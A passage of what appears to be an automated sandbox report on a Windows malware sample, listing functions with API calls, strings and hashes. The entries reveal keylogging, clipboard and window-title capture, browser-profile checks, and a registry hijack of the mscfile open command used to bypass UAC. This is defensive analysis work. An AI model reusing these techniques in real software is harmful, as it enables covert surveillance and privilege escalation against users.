                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: /C $cmd.exe$open
                          • API String ID: 587946157-3896048727
                          • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                          • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                          • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                          • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                          Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                          Strings
                          • http\shell\open\command, xrefs: 00412026
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: http\shell\open\command
                          • API String ID: 3677997916-1487954565
                          • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                          • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                          • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                          • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                          Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                          • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                          • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                          Strings
                          • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: Software\Classes\mscfile\shell\open\command
                          • API String ID: 1818849710-505396733
                          • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                          • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                          • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                          • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                          Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                            • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                            • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                          • String ID: bad locale name
                          • API String ID: 3628047217-1405518554
                          • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                          • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                          • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                          • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                          Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                          • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: P0F
                          • API String ID: 1818849710-3540264436
                          • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                          • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                          • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                          • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                          Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                          • GetProcAddress.KERNEL32(00000000), ref: 00401403
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetCursorInfo$User32.dll
                          • API String ID: 1646373207-2714051624
                          • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                          • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                          • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                          • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                          Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                          • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetLastInputInfo$User32.dll
                          • API String ID: 2574300362-1519888992
                          • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                          • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                          • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                          • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                          Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                            • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                            • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                          • Sleep.KERNEL32(00000BB8), ref: 004111DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQuerySleepValue
                          • String ID: H"G$exepath$!G
                          • API String ID: 4119054056-2148977334
                          • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                          • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                          • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                          • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                          Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                            • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                            • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                          • Sleep.KERNEL32(000001F4), ref: 0040955A
                          • Sleep.KERNEL32(00000064), ref: 004095F5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$SleepText$ForegroundLength
                          • String ID: [ $ ]
                          • API String ID: 3309952895-93608704
                          • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                          • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                          • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                          • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                          Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                          • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 3919263394-0
                          • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                          • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                          • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                          • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                          Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                          • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                          • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                          • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                          Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                          Strings
                          • /sort "Visit Time" /stext ", xrefs: 00404092
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                          • String ID: /sort "Visit Time" /stext "
                          • API String ID: 368326130-1573945896
                          • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                          • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                          • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                          • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                          Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                          • __Init_thread_footer.LIBCMT ref: 0040A6E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Init_thread_footer__onexit
                          • String ID: [End of clipboard]$[Text copied to clipboard]
                          • API String ID: 1881088180-3686566968
                          • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                          • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                          • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                          • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                          Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime
                          • String ID: | $%02i:%02i:%02i:%03i
                          • API String ID: 481472006-2430845779
                          • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                          • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                          • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                          • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                          Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                          • API String ID: 1174141254-2800177040
                          • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                          • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                          • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                          • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                          Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                          • API String ID: 1174141254-4188645398
                          • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                          • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                          • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                          • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                          Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: AppData$\Opera Software\Opera Stable\
                          • API String ID: 1174141254-1629609700
                          • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                          • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                          • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                          • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                          Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyState.USER32(00000011), ref: 0040A597
                            • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                            • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                            • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                            • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                            • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                            • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                          • String ID: [AltL]$[AltR]
                          • API String ID: 3195419117-2658077756
                          • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                          • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                          • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                          • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                          Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyState.USER32(00000012), ref: 0040A5F1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: State
                          • String ID: [CtrlL]$[CtrlR]
                          • API String ID: 1649606143-2446555240
                          • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                          • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                          • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                          • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                          Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteOpenValue
                          • String ID: 6h@
                          • API String ID: 2654517830-73392143
                          • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                          • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                          • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                          • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                          Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                          • GetLastError.KERNEL32 ref: 0043B4E9
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                          • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                          • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                          • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                          Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                          Download Yara Rule
                          APIs
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                          • SetLastError.KERNEL32(0000007F), ref: 004106DF
                          • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastRead
                          • String ID:
                          • API String ID: 4100373531-0
                          • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                          • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                          • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                          • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19